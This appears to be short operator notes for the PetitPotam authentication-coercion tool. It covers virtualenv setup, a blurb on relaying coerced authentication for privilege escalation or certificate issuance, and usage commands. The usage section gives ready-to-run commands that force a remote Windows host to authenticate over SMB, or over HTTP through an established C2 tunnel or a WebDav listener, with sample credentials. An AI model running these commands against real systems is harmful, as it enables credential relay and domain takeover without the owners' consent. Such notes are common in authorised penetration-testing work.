These tool installs are based on the existence of virtualenv.
apt update
apt install python3-virtualenvNote on virtualenv usage:
- these containers are used to allow conflicting dependency installs to live side by side harmoniously
- activate / deactivate dependency containers for proper usage
- prompt# source demo-env/bin/activate
- prompt(demo-env)# deactivate
- with screen/tmux, multiple dependency containers can be activated at the same time
PetitPotam can be installed without Impacket - and will install it - or can be installed with an activated Impacket environment.
Possible Blurb
The coercion technique has become a common approach to generating authentication events from remote systems. In some scenarios, the coerced authentication can be relayed for various purposes, including privilege escalation, or certificate issuance. PetitPotam was a purpose built tool that can enumerate SMB pipes and test remote systems for various configurations that may trigger the coerced authentication events.
Usage
Some possible scenarios for using PetitPotam look like the following.
Trigger SMB Authentication
python3 PetitPotam.py <hostIP> -u 'user' -d 'domain.tld' -p 'Password1'
Trigger HTTP Authentication via C2
- note: the below works through proxychains, targeting a box with established C2 and an open 8080 tunnel
python3 PetitPotam.py localhost@8080/blah <hostIP> -u 'user' -d 'domain.tld' -p 'Password1'
Trigger HTTP Authentication via exposed WebDav service
python3 PetitPotam.py 10.10.10.100@8080/blah <hostIP> -u 'user' -d 'example.com' -p 'Password1'